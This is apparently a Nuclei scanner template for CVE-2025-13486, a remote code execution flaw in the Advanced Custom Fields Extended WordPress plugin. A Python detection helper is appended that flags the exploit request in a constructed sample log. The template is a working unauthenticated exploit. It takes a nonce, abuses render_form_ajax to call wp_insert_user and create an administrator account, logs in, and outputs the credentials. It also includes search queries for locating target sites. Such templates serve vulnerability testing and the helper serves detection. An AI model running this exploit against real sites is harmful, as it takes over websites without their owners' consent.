id: CVE-2025-13486

info:
  name: Advanced Custom Fields Extended < 0.9.2 - Remote Code Execution
  author: 0xanis
  severity: critical
  description: |
    Advanced Custom Fields: Extended WordPress plugin 0.9.0.5 through 0.9.1.1 contains a remote code execution vulnerability caused by unsafe use of call_user_func_array() in the prepare_form() function, letting unauthenticated attackers execute arbitrary code remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to backdoor installation or creation of admin accounts.
  remediation: |
    Update to the latest version beyond 0.9.1.1.
  reference:
    - https://www.wordfence.com/blog/2025/12/100000-wordpress-sites-affected-by-remote-code-execution-vulnerability-in-advanced-custom-fields-extended-wordpress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13486
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-content/plugins/acf-extended"
  tags: cve,cve2025,wordpress,wp-plugin,acfe,rce,vkev

variables:
  username: "admin_{{rand_text_alpha(4)}}"
  password: "admin_{{rand_text_alpha(4)}}"
  email: "{{username}}@{{rand_base(5)}}.com"

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'acf\.data.*?"nonce":"([a-f0-9]+)"'
        internal: true
        name: nonce

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=acfe/form/render_form_ajax&nonce={{nonce}}&form[render]=wp_insert_user&form[user_login]={{username}}&form[user_pass]={{password}}&form[user_email]={{email}}&form[role]=administrator

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"Username: " + username + " | Password: " + password'
# digest: 4b0a00483046022100ab18f19323b7a1e4275e9b777be6e8e101a40bbcc8d29d5a01853dbf5d1aae56022100b8dd55d0dfe2f888f1554008b623f5777fc0bbb8ae03a228e413dc02127ac5a9:922c64590222798bb761d5b6d8e72950
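Added detection helper, not part of this template or the plugin: it checks whether an installed plugin version falls inside the vulnerable range stated above and flags admin-ajax requests that carry the render_form_ajax action together with a form[render] callable, the shape of the second request in this template. The JSON request-log lines are constructed, and the rule assumes (not stated in the advisory) that legitimate front-end render requests do not pass a PHP function name in form[render].

```python
"""Detection helpers for the ACF Extended render_form_ajax abuse (CVE-2025-13486)."""
import json
from urllib.parse import parse_qs, urlsplit

# Vulnerable range as stated in the template: 0.9.0.5 through 0.9.1.1 (fixed in 0.9.2).
VULN_MIN = (0, 9, 0, 5)
VULN_MAX = (0, 9, 1, 1)


def parse_version(v):
    """'0.9.1' -> (0, 9, 1, 0); pads to four components so tuple comparison lines up."""
    parts = [int(p) for p in v.strip().split(".")]
    return tuple(parts + [0] * (4 - len(parts)))[:4]


def is_vulnerable_version(v):
    return VULN_MIN <= parse_version(v) <= VULN_MAX


def flag_request(method, path, body):
    """Return a reason string if the request matches the exploit pattern, else None.

    Assumption (not from the advisory): benign render requests never carry a PHP
    callable such as wp_insert_user in form[render]; tune to your environment.
    """
    if method.upper() != "POST" or not urlsplit(path).path.endswith("/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)  # decodes form%5Brender%5D too
    if params.get("action", [""])[0] != "acfe/form/render_form_ajax":
        return None
    render = params.get("form[render]", [""])[0]
    return f"acfe render_form_ajax with form[render]={render!r}" if render else None


def scan_log(lines):
    """Parse JSON request-log lines (constructed format) and return (line_no, reason) hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = json.loads(line)
        reason = flag_request(rec["method"], rec["path"], rec.get("body", ""))
        if reason:
            hits.append((n, reason))
    return hits


# Constructed sample log (not real traffic): a benign render call, an exploit attempt, a GET.
SAMPLE_LOG = [
    '{"method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=acfe/form/render_form_ajax&nonce=ab12"}',
    '{"method": "POST", "path": "/wp-admin/admin-ajax.php", "body": "action=acfe/form/render_form_ajax&nonce=ab12&form[render]=wp_insert_user&form[role]=administrator"}',
    '{"method": "GET", "path": "/", "body": ""}',
]

if __name__ == "__main__":
    for line_no, reason in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {reason}")
```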